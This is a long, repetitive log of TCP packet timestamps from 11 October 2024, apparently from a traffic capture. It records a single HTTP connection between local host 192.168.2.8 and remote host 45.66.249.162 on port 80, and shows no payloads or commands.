                                                                                                                                                              Oct 11, 2024 22:32:39.378088951 CEST4970780192.168.2.845.66.249.162
                                                                                                                                                              Oct 11, 2024 22:32:39.378088951 CEST804970745.66.249.162192.168.2.8
                                                                                                                                                              Oct 11, 2024 22:32:39.378132105 CEST4970780192.168.2.845.66.249.162
                                                                                                                                                              Oct 11, 2024 22:32:39.378135920 CEST804970745.66.249.162192.168.2.8
                                                                                                                                                              Oct 11, 2024 22:32:39.378181934 CEST4970780192.168.2.845.66.249.162
                                                                                                                                                              Oct 11, 2024 22:32:39.399655104 CEST804970745.66.249.162192.168.2.8
                                                                                                                                                              Oct 11, 2024 22:32:39.399722099 CEST804970745.66.249.162192.168.2.8
                                                                                                                                                              Oct 11, 2024 22:32:39.399764061 CEST804970745.66.249.162192.168.2.8
                                                                                                                                                              Oct 11, 2024 22:32:39.399790049 CEST4970780192.168.2.845.66.249.162
                                                                                                                                                              Oct 11, 2024 22:32:39.399812937 CEST804970745.66.249.162192.168.2.8
                                                                                                                                                              Oct 11, 2024 22:32:39.399827003 CEST4970780192.168.2.845.66.249.162
                                                                                                                                                              Oct 11, 2024 22:32:39.399861097 CEST804970745.66.249.162192.168.2.8
                                                                                                                                                              Oct 11, 2024 22:32:39.399900913 CEST4970780192.168.2.845.66.249.162
                                                                                                                                                              Oct 11, 2024 22:32:39.400135040 CEST804970745.66.249.162192.168.2.8
                                                                                                                                                              Oct 11, 2024 22:32:39.400176048 CEST4970780192.168.2.845.66.249.162
                                                                                                                                                              Oct 11, 2024 22:32:39.400223017 CEST804970745.66.249.162192.168.2.8
                                                                                                                                                              Oct 11, 2024 22:32:39.400263071 CEST4970780192.168.2.845.66.249.162
                                                                                                                                                              Oct 11, 2024 22:32:39.462114096 CEST804970745.66.249.162192.168.2.8
                                                                                                                                                              Oct 11, 2024 22:32:39.462189913 CEST804970745.66.249.162192.168.2.8
                                                                                                                                                              Oct 11, 2024 22:32:39.462239027 CEST804970745.66.249.162192.168.2.8
                                                                                                                                                              Oct 11, 2024 22:32:39.462263107 CEST4970780192.168.2.845.66.249.162
                                                                                                                                                              Oct 11, 2024 22:32:39.462291956 CEST804970745.66.249.162192.168.2.8
                                                                                                                                                              Oct 11, 2024 22:32:39.462321043 CEST4970780192.168.2.845.66.249.162
                                                                                                                                                              Oct 11, 2024 22:32:39.462338924 CEST804970745.66.249.162192.168.2.8
                                                                                                                                                              Oct 11, 2024 22:32:39.462352037 CEST4970780192.168.2.845.66.249.162
                                                                                                                                                              Oct 11, 2024 22:32:39.462383032 CEST4970780192.168.2.845.66.249.162
                                                                                                                                                              Oct 11, 2024 22:32:39.462384939 CEST804970745.66.249.162192.168.2.8
                                                                                                                                                              Oct 11, 2024 22:32:39.462435961 CEST804970745.66.249.162192.168.2.8
                                                                                                                                                              Oct 11, 2024 22:32:39.462440014 CEST4970780192.168.2.845.66.249.162
                                                                                                                                                              Oct 11, 2024 22:32:39.462481022 CEST804970745.66.249.162192.168.2.8
                                                                                                                                                              Oct 11, 2024 22:32:39.462538958 CEST4970780192.168.2.845.66.249.162
                                                                                                                                                              Oct 11, 2024 22:32:39.462539911 CEST804970745.66.249.162192.168.2.8
                                                                                                                                                              Oct 11, 2024 22:32:39.462553024 CEST804970745.66.249.162192.168.2.8
                                                                                                                                                              Oct 11, 2024 22:32:39.462599039 CEST4970780192.168.2.845.66.249.162
                                                                                                                                                              Oct 11, 2024 22:32:39.462603092 CEST804970745.66.249.162192.168.2.8
                                                                                                                                                              Oct 11, 2024 22:32:39.462649107 CEST804970745.66.249.162192.168.2.8
                                                                                                                                                              Oct 11, 2024 22:32:39.462692022 CEST4970780192.168.2.845.66.249.162
                                                                                                                                                              Oct 11, 2024 22:32:39.462694883 CEST804970745.66.249.162192.168.2.8
                                                                                                                                                              Oct 11, 2024 22:32:39.462735891 CEST4970780192.168.2.845.66.249.162
                                                                                                                                                              Oct 11, 2024 22:32:39.462743044 CEST804970745.66.249.162192.168.2.8
                                                                                                                                                              Oct 11, 2024 22:32:39.463905096 CEST4970780192.168.2.845.66.249.162
                                                                                                                                                              Oct 11, 2024 22:32:39.528769970 CEST804970745.66.249.162192.168.2.8
                                                                                                                                                              Oct 11, 2024 22:32:39.528835058 CEST804970745.66.249.162192.168.2.8
                                                                                                                                                              Oct 11, 2024 22:32:39.528846025 CEST4970780192.168.2.845.66.249.162
                                                                                                                                                              Oct 11, 2024 22:32:39.528882980 CEST804970745.66.249.162192.168.2.8
                                                                                                                                                              Oct 11, 2024 22:32:39.528924942 CEST4970780192.168.2.845.66.249.162
                                                                                                                                                              Oct 11, 2024 22:32:39.528928041 CEST804970745.66.249.162192.168.2.8
                                                                                                                                                              Oct 11, 2024 22:32:39.528976917 CEST804970745.66.249.162192.168.2.8
                                                                                                                                                              Oct 11, 2024 22:32:39.529021978 CEST4970780192.168.2.845.66.249.162
                                                                                                                                                              Oct 11, 2024 22:32:39.529041052 CEST804970745.66.249.162192.168.2.8
                                                                                                                                                              Oct 11, 2024 22:32:39.529081106 CEST4970780192.168.2.845.66.249.162
                                                                                                                                                              Oct 11, 2024 22:32:39.529088020 CEST804970745.66.249.162192.168.2.8
                                                                                                                                                              Oct 11, 2024 22:32:39.529129028 CEST804970745.66.249.162192.168.2.8
                                                                                                                                                              Oct 11, 2024 22:32:39.529182911 CEST4970780192.168.2.845.66.249.162
                                                                                                                                                              Oct 11, 2024 22:32:39.529201031 CEST804970745.66.249.162192.168.2.8
                                                                                                                                                              Oct 11, 2024 22:32:39.529259920 CEST804970745.66.249.162192.168.2.8
                                                                                                                                                              Oct 11, 2024 22:32:39.529304028 CEST804970745.66.249.162192.168.2.8
                                                                                                                                                              Oct 11, 2024 22:32:39.529309034 CEST4970780192.168.2.845.66.249.162
                                                                                                                                                              Oct 11, 2024 22:32:39.529352903 CEST4970780192.168.2.845.66.249.162
                                                                                                                                                              Oct 11, 2024 22:32:39.529375076 CEST804970745.66.249.162192.168.2.8
                                                                                                                                                              Oct 11, 2024 22:32:39.529417038 CEST4970780192.168.2.845.66.249.162
                                                                                                                                                              Oct 11, 2024 22:32:39.529437065 CEST804970745.66.249.162192.168.2.8
                                                                                                                                                              Oct 11, 2024 22:32:39.529475927 CEST4970780192.168.2.845.66.249.162
                                                                                                                                                              Oct 11, 2024 22:32:39.529501915 CEST804970745.66.249.162192.168.2.8
                                                                                                                                                              Oct 11, 2024 22:32:39.529546976 CEST804970745.66.249.162192.168.2.8
                                                                                                                                                              Oct 11, 2024 22:32:39.529551983 CEST4970780192.168.2.845.66.249.162
                                                                                                                                                              Oct 11, 2024 22:32:39.529612064 CEST804970745.66.249.162192.168.2.8
                                                                                                                                                              Oct 11, 2024 22:32:39.529668093 CEST804970745.66.249.162192.168.2.8
                                                                                                                                                              Oct 11, 2024 22:32:39.529736042 CEST4970780192.168.2.845.66.249.162
                                                                                                                                                              Oct 11, 2024 22:32:39.529764891 CEST4970780192.168.2.845.66.249.162
                                                                                                                                                              Oct 11, 2024 22:32:39.529794931 CEST804970745.66.249.162192.168.2.8
                                                                                                                                                              Oct 11, 2024 22:32:39.529838085 CEST4970780192.168.2.845.66.249.162
                                                                                                                                                              Oct 11, 2024 22:32:39.529879093 CEST804970745.66.249.162192.168.2.8
                                                                                                                                                              Oct 11, 2024 22:32:39.529918909 CEST4970780192.168.2.845.66.249.162
                                                                                                                                                              Oct 11, 2024 22:32:39.529953957 CEST804970745.66.249.162192.168.2.8
                                                                                                                                                              Oct 11, 2024 22:32:39.529992104 CEST4970780192.168.2.845.66.249.162
                                                                                                                                                              Oct 11, 2024 22:32:39.529999018 CEST804970745.66.249.162192.168.2.8
                                                                                                                                                              Oct 11, 2024 22:32:39.530078888 CEST804970745.66.249.162192.168.2.8
                                                                                                                                                              Oct 11, 2024 22:32:39.530122042 CEST4970780192.168.2.845.66.249.162
                                                                                                                                                              Oct 11, 2024 22:32:39.530138016 CEST804970745.66.249.162192.168.2.8
                                                                                                                                                              Oct 11, 2024 22:32:39.530175924 CEST4970780192.168.2.845.66.249.162
                                                                                                                                                              Oct 11, 2024 22:32:39.530183077 CEST804970745.66.249.162192.168.2.8
                                                                                                                                                              Oct 11, 2024 22:32:39.530229092 CEST804970745.66.249.162192.168.2.8
                                                                                                                                                              Oct 11, 2024 22:32:39.530268908 CEST4970780192.168.2.845.66.249.162
                                                                                                                                                              Oct 11, 2024 22:32:39.530272007 CEST804970745.66.249.162192.168.2.8
                                                                                                                                                              Oct 11, 2024 22:32:39.530339956 CEST804970745.66.249.162192.168.2.8
                                                                                                                                                              Oct 11, 2024 22:32:39.530395031 CEST4970780192.168.2.845.66.249.162
                                                                                                                                                              Oct 11, 2024 22:32:39.530407906 CEST804970745.66.249.162192.168.2.8
                                                                                                                                                              Oct 11, 2024 22:32:39.530448914 CEST4970780192.168.2.845.66.249.162
                                                                                                                                                              Oct 11, 2024 22:32:39.530463934 CEST804970745.66.249.162192.168.2.8
                                                                                                                                                              Oct 11, 2024 22:32:39.530548096 CEST804970745.66.249.162192.168.2.8
                                                                                                                                                              Oct 11, 2024 22:32:39.530560970 CEST4970780192.168.2.845.66.249.162
                                                                                                                                                              Oct 11, 2024 22:32:39.530586004 CEST4970780192.168.2.845.66.249.162
                                                                                                                                                              Oct 11, 2024 22:32:39.530592918 CEST804970745.66.249.162192.168.2.8
                                                                                                                                                              Oct 11, 2024 22:32:39.530635118 CEST4970780192.168.2.845.66.249.162
                                                                                                                                                              Oct 11, 2024 22:32:39.530641079 CEST804970745.66.249.162192.168.2.8
                                                                                                                                                              Oct 11, 2024 22:32:39.530678988 CEST4970780192.168.2.845.66.249.162
                                                                                                                                                              Oct 11, 2024 22:32:39.530700922 CEST804970745.66.249.162192.168.2.8
                                                                                                                                                              Oct 11, 2024 22:32:39.530740023 CEST4970780192.168.2.845.66.249.162
                                                                                                                                                              Oct 11, 2024 22:32:39.530746937 CEST804970745.66.249.162192.168.2.8
                                                                                                                                                              Oct 11, 2024 22:32:39.530783892 CEST4970780192.168.2.845.66.249.162
                                                                                                                                                              Oct 11, 2024 22:32:39.530787945 CEST804970745.66.249.162192.168.2.8
                                                                                                                                                              Oct 11, 2024 22:32:39.530826092 CEST4970780192.168.2.845.66.249.162
                                                                                                                                                              Oct 11, 2024 22:32:39.530858040 CEST804970745.66.249.162192.168.2.8
                                                                                                                                                              Oct 11, 2024 22:32:39.530908108 CEST804970745.66.249.162192.168.2.8
                                                                                                                                                              Oct 11, 2024 22:32:39.530949116 CEST4970780192.168.2.845.66.249.162
                                                                                                                                                              Oct 11, 2024 22:32:39.530961990 CEST804970745.66.249.162192.168.2.8
                                                                                                                                                              Oct 11, 2024 22:32:39.531001091 CEST804970745.66.249.162192.168.2.8
                                                                                                                                                              Oct 11, 2024 22:32:39.531042099 CEST4970780192.168.2.845.66.249.162
                                                                                                                                                              Oct 11, 2024 22:32:39.531048059 CEST804970745.66.249.162192.168.2.8
                                                                                                                                                              Oct 11, 2024 22:32:39.531085014 CEST4970780192.168.2.845.66.249.162
                                                                                                                                                              Oct 11, 2024 22:32:39.531097889 CEST804970745.66.249.162192.168.2.8
                                                                                                                                                              Oct 11, 2024 22:32:39.531155109 CEST804970745.66.249.162192.168.2.8
                                                                                                                                                              Oct 11, 2024 22:32:39.531199932 CEST4970780192.168.2.845.66.249.162
                                                                                                                                                              Oct 11, 2024 22:32:39.531213999 CEST804970745.66.249.162192.168.2.8
                                                                                                                                                              Oct 11, 2024 22:32:39.531259060 CEST4970780192.168.2.845.66.249.162
                                                                                                                                                              Oct 11, 2024 22:32:39.531260014 CEST804970745.66.249.162192.168.2.8
                                                                                                                                                              Oct 11, 2024 22:32:39.531306982 CEST804970745.66.249.162192.168.2.8
                                                                                                                                                              Oct 11, 2024 22:32:39.531352997 CEST4970780192.168.2.845.66.249.162
                                                                                                                                                              Oct 11, 2024 22:32:39.531405926 CEST804970745.66.249.162192.168.2.8
                                                                                                                                                              Oct 11, 2024 22:32:39.531451941 CEST4970780192.168.2.845.66.249.162
                                                                                                                                                              Oct 11, 2024 22:32:39.531455994 CEST804970745.66.249.162192.168.2.8
                                                                                                                                                              Oct 11, 2024 22:32:39.531501055 CEST4970780192.168.2.845.66.249.162
                                                                                                                                                              Oct 11, 2024 22:32:39.531502008 CEST804970745.66.249.162192.168.2.8
                                                                                                                                                              Oct 11, 2024 22:32:39.531539917 CEST4970780192.168.2.845.66.249.162
                                                                                                                                                              Oct 11, 2024 22:32:39.531548023 CEST804970745.66.249.162192.168.2.8
                                                                                                                                                              Oct 11, 2024 22:32:39.531590939 CEST4970780192.168.2.845.66.249.162
                                                                                                                                                              Oct 11, 2024 22:32:39.531594038 CEST804970745.66.249.162192.168.2.8
                                                                                                                                                              Oct 11, 2024 22:32:39.531640053 CEST804970745.66.249.162192.168.2.8
                                                                                                                                                              Oct 11, 2024 22:32:39.531683922 CEST804970745.66.249.162192.168.2.8
                                                                                                                                                              Oct 11, 2024 22:32:39.531685114 CEST4970780192.168.2.845.66.249.162
                                                                                                                                                              Oct 11, 2024 22:32:39.531727076 CEST804970745.66.249.162192.168.2.8
                                                                                                                                                              Oct 11, 2024 22:32:39.531733036 CEST4970780192.168.2.845.66.249.162
                                                                                                                                                              Oct 11, 2024 22:32:39.531766891 CEST4970780192.168.2.845.66.249.162
                                                                                                                                                              Oct 11, 2024 22:32:39.531775951 CEST804970745.66.249.162192.168.2.8
                                                                                                                                                              Oct 11, 2024 22:32:39.531810999 CEST4970780192.168.2.845.66.249.162
                                                                                                                                                              Oct 11, 2024 22:32:39.531821012 CEST804970745.66.249.162192.168.2.8
                                                                                                                                                              Oct 11, 2024 22:32:39.531866074 CEST804970745.66.249.162192.168.2.8
                                                                                                                                                              Oct 11, 2024 22:32:39.531867981 CEST4970780192.168.2.845.66.249.162
                                                                                                                                                              Oct 11, 2024 22:32:39.531913996 CEST4970780192.168.2.845.66.249.162
                                                                                                                                                              Oct 11, 2024 22:32:39.531924009 CEST804970745.66.249.162192.168.2.8
                                                                                                                                                              Oct 11, 2024 22:32:39.531969070 CEST804970745.66.249.162192.168.2.8
                                                                                                                                                              Oct 11, 2024 22:32:39.532001019 CEST804970745.66.249.162192.168.2.8
                                                                                                                                                              Oct 11, 2024 22:32:39.532017946 CEST4970780192.168.2.845.66.249.162
                                                                                                                                                              Oct 11, 2024 22:32:39.532033920 CEST804970745.66.249.162192.168.2.8
                                                                                                                                                              Oct 11, 2024 22:32:39.532078028 CEST804970745.66.249.162192.168.2.8
                                                                                                                                                              Oct 11, 2024 22:32:39.532107115 CEST4970780192.168.2.845.66.249.162
                                                                                                                                                              Oct 11, 2024 22:32:39.532124043 CEST804970745.66.249.162192.168.2.8
                                                                                                                                                              Oct 11, 2024 22:32:39.532140970 CEST4970780192.168.2.845.66.249.162
                                                                                                                                                              Oct 11, 2024 22:32:39.532171011 CEST804970745.66.249.162192.168.2.8
                                                                                                                                                              Oct 11, 2024 22:32:39.532172918 CEST4970780192.168.2.845.66.249.162
                                                                                                                                                              Oct 11, 2024 22:32:39.532217026 CEST804970745.66.249.162192.168.2.8
                                                                                                                                                              Oct 11, 2024 22:32:39.532258034 CEST4970780192.168.2.845.66.249.162
                                                                                                                                                              Oct 11, 2024 22:32:39.532263041 CEST804970745.66.249.162192.168.2.8
                                                                                                                                                              Oct 11, 2024 22:32:39.532303095 CEST4970780192.168.2.845.66.249.162
                                                                                                                                                              Oct 11, 2024 22:32:39.532304049 CEST804970745.66.249.162192.168.2.8
                                                                                                                                                              Oct 11, 2024 22:32:39.532360077 CEST804970745.66.249.162192.168.2.8
                                                                                                                                                              Oct 11, 2024 22:32:39.532401085 CEST4970780192.168.2.845.66.249.162
                                                                                                                                                              Oct 11, 2024 22:32:39.532407045 CEST804970745.66.249.162192.168.2.8
                                                                                                                                                              Oct 11, 2024 22:32:39.532448053 CEST4970780192.168.2.845.66.249.162
                                                                                                                                                              Oct 11, 2024 22:32:39.532453060 CEST804970745.66.249.162192.168.2.8
                                                                                                                                                              Oct 11, 2024 22:32:39.532510996 CEST804970745.66.249.162192.168.2.8
                                                                                                                                                              Oct 11, 2024 22:32:39.532557011 CEST804970745.66.249.162192.168.2.8
                                                                                                                                                              Oct 11, 2024 22:32:39.532582045 CEST4970780192.168.2.845.66.249.162
                                                                                                                                                              Oct 11, 2024 22:32:39.532594919 CEST4970780192.168.2.845.66.249.162
                                                                                                                                                              Oct 11, 2024 22:32:39.532613993 CEST804970745.66.249.162192.168.2.8
                                                                                                                                                              Oct 11, 2024 22:32:39.532659054 CEST804970745.66.249.162192.168.2.8
                                                                                                                                                              Oct 11, 2024 22:32:39.532701969 CEST4970780192.168.2.845.66.249.162
                                                                                                                                                              Oct 11, 2024 22:32:39.532717943 CEST804970745.66.249.162192.168.2.8
                                                                                                                                                              Oct 11, 2024 22:32:39.532758951 CEST4970780192.168.2.845.66.249.162
                                                                                                                                                              Oct 11, 2024 22:32:39.532763004 CEST804970745.66.249.162192.168.2.8
                                                                                                                                                              Oct 11, 2024 22:32:39.532819986 CEST804970745.66.249.162192.168.2.8
                                                                                                                                                              Oct 11, 2024 22:32:39.532864094 CEST804970745.66.249.162192.168.2.8
                                                                                                                                                              Oct 11, 2024 22:32:39.532866955 CEST4970780192.168.2.845.66.249.162
                                                                                                                                                              Oct 11, 2024 22:32:39.532912970 CEST4970780192.168.2.845.66.249.162
                                                                                                                                                              Oct 11, 2024 22:32:39.532919884 CEST804970745.66.249.162192.168.2.8
                                                                                                                                                              Oct 11, 2024 22:32:39.532969952 CEST804970745.66.249.162192.168.2.8
                                                                                                                                                              Oct 11, 2024 22:32:39.533006907 CEST4970780192.168.2.845.66.249.162
                                                                                                                                                              Oct 11, 2024 22:32:39.533008099 CEST804970745.66.249.162192.168.2.8
                                                                                                                                                              Oct 11, 2024 22:32:39.533054113 CEST804970745.66.249.162192.168.2.8
                                                                                                                                                              Oct 11, 2024 22:32:39.533087969 CEST4970780192.168.2.845.66.249.162
                                                                                                                                                              Oct 11, 2024 22:32:39.533097029 CEST804970745.66.249.162192.168.2.8
                                                                                                                                                              Oct 11, 2024 22:32:39.533142090 CEST804970745.66.249.162192.168.2.8
                                                                                                                                                              Oct 11, 2024 22:32:39.533165932 CEST4970780192.168.2.845.66.249.162
                                                                                                                                                              Oct 11, 2024 22:32:39.533199072 CEST804970745.66.249.162192.168.2.8
                                                                                                                                                              Oct 11, 2024 22:32:39.533236980 CEST4970780192.168.2.845.66.249.162
                                                                                                                                                              Oct 11, 2024 22:32:39.533243895 CEST804970745.66.249.162192.168.2.8
                                                                                                                                                              Oct 11, 2024 22:32:39.533288956 CEST804970745.66.249.162192.168.2.8
                                                                                                                                                              Oct 11, 2024 22:32:39.533327103 CEST4970780192.168.2.845.66.249.162
                                                                                                                                                              Oct 11, 2024 22:32:39.533333063 CEST804970745.66.249.162192.168.2.8
                                                                                                                                                              Oct 11, 2024 22:32:39.533370972 CEST4970780192.168.2.845.66.249.162
                                                                                                                                                              Oct 11, 2024 22:32:39.533385038 CEST804970745.66.249.162192.168.2.8
                                                                                                                                                              Oct 11, 2024 22:32:39.533430099 CEST804970745.66.249.162192.168.2.8
                                                                                                                                                              Oct 11, 2024 22:32:39.533469915 CEST4970780192.168.2.845.66.249.162
                                                                                                                                                              Oct 11, 2024 22:32:39.533474922 CEST804970745.66.249.162192.168.2.8
                                                                                                                                                              Oct 11, 2024 22:32:39.533519983 CEST804970745.66.249.162192.168.2.8
                                                                                                                                                              Oct 11, 2024 22:32:39.533557892 CEST4970780192.168.2.845.66.249.162
                                                                                                                                                              Oct 11, 2024 22:32:39.533565044 CEST804970745.66.249.162192.168.2.8
                                                                                                                                                              Oct 11, 2024 22:32:39.533601046 CEST4970780192.168.2.845.66.249.162
                                                                                                                                                              Oct 11, 2024 22:32:39.533632994 CEST804970745.66.249.162192.168.2.8
                                                                                                                                                              Oct 11, 2024 22:32:39.533679962 CEST804970745.66.249.162192.168.2.8
                                                                                                                                                              Oct 11, 2024 22:32:39.533718109 CEST4970780192.168.2.845.66.249.162
                                                                                                                                                              Oct 11, 2024 22:32:39.533724070 CEST804970745.66.249.162192.168.2.8
                                                                                                                                                              Oct 11, 2024 22:32:39.533768892 CEST804970745.66.249.162192.168.2.8
                                                                                                                                                              Oct 11, 2024 22:32:39.533808947 CEST4970780192.168.2.845.66.249.162
                                                                                                                                                              Oct 11, 2024 22:32:39.533808947 CEST804970745.66.249.162192.168.2.8
                                                                                                                                                              Oct 11, 2024 22:32:39.533843994 CEST4970780192.168.2.845.66.249.162
                                                                                                                                                              Oct 11, 2024 22:32:39.533852100 CEST804970745.66.249.162192.168.2.8
                                                                                                                                                              Oct 11, 2024 22:32:39.533905029 CEST804970745.66.249.162192.168.2.8
                                                                                                                                                              Oct 11, 2024 22:32:39.533946037 CEST4970780192.168.2.845.66.249.162
                                                                                                                                                              Oct 11, 2024 22:32:39.533950090 CEST804970745.66.249.162192.168.2.8
                                                                                                                                                              Oct 11, 2024 22:32:39.534017086 CEST804970745.66.249.162192.168.2.8
                                                                                                                                                              Oct 11, 2024 22:32:39.534060955 CEST804970745.66.249.162192.168.2.8
                                                                                                                                                              Oct 11, 2024 22:32:39.534064054 CEST4970780192.168.2.845.66.249.162
                                                                                                                                                              Oct 11, 2024 22:32:39.534099102 CEST4970780192.168.2.845.66.249.162
                                                                                                                                                              Oct 11, 2024 22:32:39.534109116 CEST804970745.66.249.162192.168.2.8
                                                                                                                                                              Oct 11, 2024 22:32:39.534173012 CEST804970745.66.249.162192.168.2.8
                                                                                                                                                              Oct 11, 2024 22:32:39.534213066 CEST4970780192.168.2.845.66.249.162
                                                                                                                                                              Oct 11, 2024 22:32:39.550587893 CEST804970745.66.249.162192.168.2.8
                                                                                                                                                              Oct 11, 2024 22:32:39.550614119 CEST804970745.66.249.162192.168.2.8
                                                                                                                                                              Oct 11, 2024 22:32:39.550633907 CEST804970745.66.249.162192.168.2.8
                                                                                                                                                              Oct 11, 2024 22:32:39.550647974 CEST4970780192.168.2.845.66.249.162
                                                                                                                                                              Oct 11, 2024 22:32:39.550652027 CEST804970745.66.249.162192.168.2.8
                                                                                                                                                              Oct 11, 2024 22:32:39.550695896 CEST4970780192.168.2.845.66.249.162
                                                                                                                                                              Oct 11, 2024 22:32:39.550695896 CEST4970780192.168.2.845.66.249.162
                                                                                                                                                              Oct 11, 2024 22:32:39.550695896 CEST4970780192.168.2.845.66.249.162
                                                                                                                                                              Oct 11, 2024 22:32:39.550712109 CEST804970745.66.249.162192.168.2.8
                                                                                                                                                              Oct 11, 2024 22:32:39.550736904 CEST804970745.66.249.162192.168.2.8
                                                                                                                                                              Oct 11, 2024 22:32:39.550755978 CEST804970745.66.249.162192.168.2.8
                                                                                                                                                              Oct 11, 2024 22:32:39.550770044 CEST804970745.66.249.162192.168.2.8
                                                                                                                                                              Oct 11, 2024 22:32:39.550774097 CEST4970780192.168.2.845.66.249.162
                                                                                                                                                              Oct 11, 2024 22:32:39.550797939 CEST804970745.66.249.162192.168.2.8
                                                                                                                                                              Oct 11, 2024 22:32:39.550801992 CEST4970780192.168.2.845.66.249.162
                                                                                                                                                              Oct 11, 2024 22:32:39.550822973 CEST4970780192.168.2.845.66.249.162
                                                                                                                                                              Oct 11, 2024 22:32:39.550841093 CEST4970780192.168.2.845.66.249.162
                                                                                                                                                              Oct 11, 2024 22:32:39.551273108 CEST804970745.66.249.162192.168.2.8
                                                                                                                                                              Oct 11, 2024 22:32:39.551290989 CEST804970745.66.249.162192.168.2.8
                                                                                                                                                              Oct 11, 2024 22:32:39.551317930 CEST804970745.66.249.162192.168.2.8
                                                                                                                                                              Oct 11, 2024 22:32:39.551317930 CEST4970780192.168.2.845.66.249.162
                                                                                                                                                              Oct 11, 2024 22:32:39.551331997 CEST4970780192.168.2.845.66.249.162
                                                                                                                                                              Oct 11, 2024 22:32:39.551337957 CEST804970745.66.249.162192.168.2.8
                                                                                                                                                              Oct 11, 2024 22:32:39.551352024 CEST4970780192.168.2.845.66.249.162
                                                                                                                                                              Oct 11, 2024 22:32:39.551359892 CEST804970745.66.249.162192.168.2.8
                                                                                                                                                              Oct 11, 2024 22:32:39.551371098 CEST4970780192.168.2.845.66.249.162
                                                                                                                                                              Oct 11, 2024 22:32:39.551395893 CEST4970780192.168.2.845.66.249.162
                                                                                                                                                              Oct 11, 2024 22:32:39.617429972 CEST804970745.66.249.162192.168.2.8
                                                                                                                                                              Oct 11, 2024 22:32:39.617446899 CEST804970745.66.249.162192.168.2.8
                                                                                                                                                              Oct 11, 2024 22:32:39.617480993 CEST804970745.66.249.162192.168.2.8
                                                                                                                                                              Oct 11, 2024 22:32:39.617491007 CEST4970780192.168.2.845.66.249.162
                                                                                                                                                              Oct 11, 2024 22:32:39.617503881 CEST804970745.66.249.162192.168.2.8
                                                                                                                                                              Oct 11, 2024 22:32:39.617523909 CEST804970745.66.249.162192.168.2.8
                                                                                                                                                              Oct 11, 2024 22:32:39.617532969 CEST4970780192.168.2.845.66.249.162
                                                                                                                                                              Oct 11, 2024 22:32:39.617532969 CEST4970780192.168.2.845.66.249.162
                                                                                                                                                              Oct 11, 2024 22:32:39.617544889 CEST4970780192.168.2.845.66.249.162
                                                                                                                                                              Oct 11, 2024 22:32:39.617544889 CEST804970745.66.249.162192.168.2.8
                                                                                                                                                              Oct 11, 2024 22:32:39.617558956 CEST4970780192.168.2.845.66.249.162
                                                                                                                                                              Oct 11, 2024 22:32:39.617573023 CEST804970745.66.249.162192.168.2.8
                                                                                                                                                              Oct 11, 2024 22:32:39.617578983 CEST4970780192.168.2.845.66.249.162
                                                                                                                                                              Oct 11, 2024 22:32:39.617594957 CEST804970745.66.249.162192.168.2.8
                                                                                                                                                              Oct 11, 2024 22:32:39.617604971 CEST4970780192.168.2.845.66.249.162
                                                                                                                                                              Oct 11, 2024 22:32:39.617651939 CEST4970780192.168.2.845.66.249.162
                                                                                                                                                              Oct 11, 2024 22:32:39.619477034 CEST804970745.66.249.162192.168.2.8
                                                                                                                                                              Oct 11, 2024 22:32:39.619494915 CEST804970745.66.249.162192.168.2.8
                                                                                                                                                              Oct 11, 2024 22:32:39.619507074 CEST804970745.66.249.162192.168.2.8
                                                                                                                                                              Oct 11, 2024 22:32:39.619518042 CEST804970745.66.249.162192.168.2.8
                                                                                                                                                              Oct 11, 2024 22:32:39.619529963 CEST804970745.66.249.162192.168.2.8
                                                                                                                                                              Oct 11, 2024 22:32:39.619529963 CEST4970780192.168.2.845.66.249.162
                                                                                                                                                              Oct 11, 2024 22:32:39.619540930 CEST804970745.66.249.162192.168.2.8
                                                                                                                                                              Oct 11, 2024 22:32:39.619554043 CEST804970745.66.249.162192.168.2.8
                                                                                                                                                              Oct 11, 2024 22:32:39.619554043 CEST4970780192.168.2.845.66.249.162
                                                                                                                                                              Oct 11, 2024 22:32:39.619569063 CEST804970745.66.249.162192.168.2.8
                                                                                                                                                              Oct 11, 2024 22:32:39.619580984 CEST804970745.66.249.162192.168.2.8
                                                                                                                                                              Oct 11, 2024 22:32:39.619590044 CEST4970780192.168.2.845.66.249.162
                                                                                                                                                              Oct 11, 2024 22:32:39.619702101 CEST4970780192.168.2.845.66.249.162
                                                                                                                                                              Oct 11, 2024 22:32:39.679909945 CEST804970745.66.249.162192.168.2.8
                                                                                                                                                              Oct 11, 2024 22:32:39.679945946 CEST804970745.66.249.162192.168.2.8
                                                                                                                                                              Oct 11, 2024 22:32:39.679965019 CEST804970745.66.249.162192.168.2.8
                                                                                                                                                              Oct 11, 2024 22:32:39.679990053 CEST804970745.66.249.162192.168.2.8
                                                                                                                                                              Oct 11, 2024 22:32:39.680001974 CEST804970745.66.249.162192.168.2.8
                                                                                                                                                              Oct 11, 2024 22:32:39.680011988 CEST804970745.66.249.162192.168.2.8
                                                                                                                                                              Oct 11, 2024 22:32:39.680022955 CEST804970745.66.249.162192.168.2.8
                                                                                                                                                              Oct 11, 2024 22:32:39.680033922 CEST804970745.66.249.162192.168.2.8
                                                                                                                                                              Oct 11, 2024 22:32:39.680044889 CEST804970745.66.249.162192.168.2.8
                                                                                                                                                              Oct 11, 2024 22:32:39.680054903 CEST804970745.66.249.162192.168.2.8
                                                                                                                                                              Oct 11, 2024 22:32:39.680064917 CEST804970745.66.249.162192.168.2.8
                                                                                                                                                              Oct 11, 2024 22:32:39.680075884 CEST804970745.66.249.162192.168.2.8
                                                                                                                                                              Oct 11, 2024 22:32:39.680087090 CEST804970745.66.249.162192.168.2.8
                                                                                                                                                              Oct 11, 2024 22:32:39.680092096 CEST4970780192.168.2.845.66.249.162
                                                                                                                                                              Oct 11, 2024 22:32:39.680097103 CEST804970745.66.249.162192.168.2.8
                                                                                                                                                              Oct 11, 2024 22:32:39.680135012 CEST4970780192.168.2.845.66.249.162
                                                                                                                                                              Oct 11, 2024 22:32:39.680135965 CEST804970745.66.249.162192.168.2.8
                                                                                                                                                              Oct 11, 2024 22:32:39.680149078 CEST804970745.66.249.162192.168.2.8
                                                                                                                                                              Oct 11, 2024 22:32:39.680183887 CEST4970780192.168.2.845.66.249.162
                                                                                                                                                              Oct 11, 2024 22:32:39.680198908 CEST4970780192.168.2.845.66.249.162
                                                                                                                                                              Oct 11, 2024 22:32:39.680239916 CEST804970745.66.249.162192.168.2.8
                                                                                                                                                              Oct 11, 2024 22:32:39.680253029 CEST804970745.66.249.162192.168.2.8
                                                                                                                                                              Oct 11, 2024 22:32:39.680265903 CEST804970745.66.249.162192.168.2.8
                                                                                                                                                              Oct 11, 2024 22:32:39.680283070 CEST4970780192.168.2.845.66.249.162
                                                                                                                                                              Oct 11, 2024 22:32:39.680294991 CEST804970745.66.249.162192.168.2.8
                                                                                                                                                              Oct 11, 2024 22:32:39.680303097 CEST4970780192.168.2.845.66.249.162
